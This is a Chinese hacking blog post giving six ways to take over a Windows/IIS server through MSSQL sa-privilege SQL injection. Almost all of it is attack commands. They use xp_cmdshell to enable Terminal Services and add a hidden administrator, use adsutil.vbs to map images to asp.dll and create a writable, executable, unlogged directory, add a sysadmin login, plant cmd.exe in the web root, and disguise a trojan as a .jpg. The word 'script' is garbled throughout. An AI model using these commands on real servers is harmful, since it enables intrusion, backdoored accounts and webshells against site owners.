sa入侵上传的另类思路
>文章作者:linzi
mssql injection之sa的利用
数据库和网站放同一服务器:
方法一:
开TS,加账户上去,具体语句如下:
;exec master.dbo.xp_cmdshell '@echo [Components] > c:\sql'
;exec master.dbo.xp_cmdshell '@echo TSEnable = on >> c:\sql'
;exec master.dbo.xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q'
;exec master.dbo.xp_cmdshell '@del C:\server'
Exec Master..Xp_CmdShell 'net user linzi 123 /add'
Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'
方法二:
用asp.dll解析jpg格式,然后通过上传点,合法的上传一个asp木马,主要是利用Adsutil.vbs
这个脚本来实现。
具体语句是:
csc太阳pt C:\Inetpub\AdminSc太阳pts\adsutil.vbs ENUM w3svc/3/root 得到其目录
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
方法三:
加个system权限的用户,然后用查询分析器连接上去
具体语句:
;exec master.dbo.sp_addlogin linzi;--
;exec master.dbo.sp_password null,linzi,linzi;--
;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--
方法四:
老洞新用.构造原始的U漏洞,然后用小金写的工具连接上去,实现上传
具体语句如下:
;exec master.dbo.xp_cmdshell'copy c:\winnt\system32\cmd.exe c:\inetpub\sc太阳pts\linzi.exe'
方法五:
利用Adsutil.vbs建一个有浏览,写,执行等权限的目录,然后实现上传
具体语句如下:
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Path "c:\"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0
然后_blank>http://ip/linzi/登上去
方法六:
暴路径,然后,写入小马,或者上传一张图木马,然后再用copy命令把扩展名改成asp
具体语句如下:
1.暴目录:
;create table [dbo].[linzi] ([daya][char](255));--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into linzi (daya) values(@result);--
and 1=(select top 1 daya from linzi)
2.图片改名
copy 图片路径+linzi.jpg 图片路径+linzi.asp
面的六种方法,可以说是比较有效的六种,当然,对于sa入侵的方法五花八门,我个人是常用上面几种,因为上面
的几种方法,对于大部份的网站已经够了,好了,有时间继续写数据库不是放在同一服务器的攻击方法。
累啊!~~~
详细看我做的几个动画,我个人常用的方法是先开Terminal Service,然后再写入down.vbs,再上传一个端口转发工具,如htran,转发到公网,直接登陆,动画里有。
动画下载:
_blank>http://www.cnbct.org/bbs/dispbbs.asp?boardID=5&ID=52&page=1
Trackback: http://tb.donews.net/TrackBack.aspx?PostId=370214